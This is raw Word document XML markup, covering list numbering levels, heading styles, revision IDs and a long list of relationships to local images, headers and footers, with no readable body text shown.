        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="00121F1C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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FDA8C86C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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="76CA878A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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="430208B2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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EE1C26E8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4"/>
        <w:szCs w:val="44"/>
        <w:u w:val="none" w:color="000000"/>
        <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1AF0B684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4"/>
        <w:szCs w:val="4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1DE64473"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="439E99E8"/>
    <w:lvl w:ilvl="0" w:tplc="EA60EE4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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1" w:tplc="3B84BAC2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2" w:tplc="375C0FB8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3" w:tplc="5614A534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4" w:tplc="37FC3AC8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5" w:tplc="64AA6736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6" w:tplc="0B72858A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7" w:tplc="761C6D4E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8" w:tplc="C7E88B30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265D01B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F3849C6"/>
    <w:lvl w:ilvl="0" w:tplc="98E88B3C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="83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24D0C6A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="166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D88C16D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="23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ACB63E02">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="310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579EC37C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="382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E70C6BFC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="454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FC3C1B6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="526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B28C439C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="59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0520F97C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="670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26793C86"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63E4A158"/>
    <w:lvl w:ilvl="0" w:tplc="2F94C0CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="96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1" w:tplc="E0A0059E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="113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2" w:tplc="DB7841A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="185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3" w:tplc="9C305292">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="257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4" w:tplc="FC3663B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="329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5" w:tplc="34B0AB12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="401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6" w:tplc="713A1BC2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="473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7" w:tplc="491A00DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="545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  <w:lvl w:ilvl="8" w:tplc="7024A5B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="617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8"/>
        <w:szCs w:val="4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2F9116A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F9E8894"/>
    <w:lvl w:ilvl="0" w:tplc="067C2C1A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="56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6054E8C4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450A10DE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6BB68D38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17A2E7F8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DC369E3A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B108243E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DE5621FA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ED4AC84A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46155973"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="986628FA"/>
    <w:lvl w:ilvl="0" w:tplc="6346D44A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlPicBulletId w:val="0"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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1" w:tplc="9B42C8BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="121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2" w:tplc="945E5704">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="193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3" w:tplc="BC882CA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="265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4" w:tplc="76F40BAA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="337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5" w:tplc="EA7C541A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="409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6" w:tplc="F8347ADA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="481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7" w:tplc="71F087EA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="553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8" w:tplc="B89CB714">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="625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55BE1997"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B128D14A"/>
    <w:lvl w:ilvl="0" w:tplc="AA74A3DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="56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5402457C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FC747328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296ECB24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B2EA5188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44DE6C92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77683688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4670A734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24320318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78E25304"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19D2E0CA"/>
    <w:lvl w:ilvl="0" w:tplc="2D022748">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlPicBulletId w:val="1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="95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1" w:tplc="4A4CC890">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="149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2" w:tplc="B5E46D08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="221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3" w:tplc="32183548">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="293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4" w:tplc="7152DDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="365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5" w:tplc="FF78644E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="437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6" w:tplc="9FD2EB18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="509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7" w:tplc="AB2895DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="581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  <w:lvl w:ilvl="8" w:tplc="870EC0FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="653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4"/>
        <w:szCs w:val="5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8"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9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NDUwMzQzNzSwNDBR0lEKTi0uzszPAykwrAUAA1ARfSwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="007A5F0C"/>
    <w:rsid w:val="006F6D33"/>
    <w:rsid w:val="007A5F0C"/>
    <w:rsid w:val="007C46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0952D2"/>
  <w15:docId w15:val="{C0CF604C-10A3-4C01-A353-EE71A51296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3"/>
      <w:ind w:left="25" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="74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409"/>
      <w:ind w:right="3669"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="50"/>
      <w:u w:val="single" w:color="000000"/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keepLines/>
      <w:spacing w:after="0"/>
      <w:ind w:left="10" w:right="225" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="50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link w:val="Heading3"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="50"/>
      <w:u w:val="single" w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="50"/>
      <w:u w:val="single" w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="7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77.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpg"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpg"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.jpg"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpg"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpg"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image113.jpg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpg"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.jpg"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.jpg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.jpg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.jpeg"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.jpg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.jpg"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.jpg"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.jpg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpg"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.jpg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.jpg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header19.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.jpg"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.jpg"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.jpg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.jpg"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpg"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image156.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpg"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.jpg"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpg"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.jpg"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.jpg"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.jpg"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpg"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header20.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.jpg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.jpg"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.jpg"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.jpg"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.jpg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.jpg"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpg"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.jpg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpg"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.jpg"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.jpg"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header23.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image59.jpg"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.jpg"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jpg"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image106.jpg"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.jpg"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.jpg"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image158.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.jpg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.jpg"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpg"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpg"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer20.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.jpg"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.jpg"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.jpg"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.jpg"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer22.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image161.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header4.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.jpg"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.jpg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image91.jpg"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.jpg"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.jpg"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.jpg"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpg"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image107.jpg"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.jpg"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.jpg"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image463.jpg"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.jpg"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image142.jpg"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.jpg"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer23.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.jpg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer17.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.jpg"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.jpg"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpg"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header21.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.jpg"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpg"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.jpg"/><Relationship Id="rId169" 